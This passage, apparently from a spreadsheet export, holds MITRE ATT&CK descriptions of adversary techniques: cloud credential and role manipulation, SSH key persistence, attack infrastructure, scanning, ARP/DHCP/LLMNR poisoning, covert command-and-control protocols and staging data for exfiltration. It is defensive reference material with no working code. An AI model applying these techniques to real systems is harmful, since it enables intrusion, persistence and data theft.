In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the &lt;code&gt;CreateKeyPair&lt;/code&gt; or &lt;code&gt;ImportKeyPair&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud compute os-login ssh-keys add&lt;/code&gt; command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the &lt;code&gt;CreateAccessKey&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud iam service-accounts keys create&lt;/code&gt; command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the &lt;code&gt;CreatePolicyVersion&lt;/code&gt; API to define a new version of an IAM policy or the &lt;code&gt;AttachUserPolicy&lt;/code&gt; API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) </t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 
For example, the &lt;code&gt;Add-MailboxPermission&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) 
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)</t>
  </si>
  <si>
    <t>Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds)
Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) 
Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the SSH &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The &lt;code&gt;authorized_keys&lt;/code&gt; file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. </t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)</t>
  </si>
  <si>
    <t>Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)</t>
  </si>
  <si>
    <t>Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)</t>
  </si>
  <si>
    <t>Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)</t>
  </si>
  <si>
    <t>Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)</t>
  </si>
  <si>
    <t>Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)).  
As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. </t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)
Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: 
1. The client broadcasts a `DISCOVER` message.
2. The server responds with an `OFFER` message, which includes an available network address. 
3. The client broadcasts a `REQUEST` message, which includes the network address offered. 
4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.
Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.
DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a &lt;code&gt;INFORMATION-REQUEST (code 11)&lt;/code&gt; message to the &lt;code&gt;All_DHCP_Relay_Agents_and_Servers&lt;/code&gt; multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.
Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. </t>
  </si>
  <si>
    <t>By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.
In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. 
Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</t>
  </si>
  <si>
    <t>Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as &lt;code&gt;tar&lt;/code&gt; on Linux and macOS or &lt;code&gt;zip&lt;/code&gt; on Windows systems. On Windows, &lt;code&gt;diantz&lt;/code&gt; or &lt;code&gt; makecab&lt;/code&gt; may be used to package collected files into a cabinet (.cab) file. &lt;code&gt;diantz&lt;/code&gt; may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, &lt;code&gt;xcopy&lt;/code&gt; on Windows can copy files and directories with a variety of options.
Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)</t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
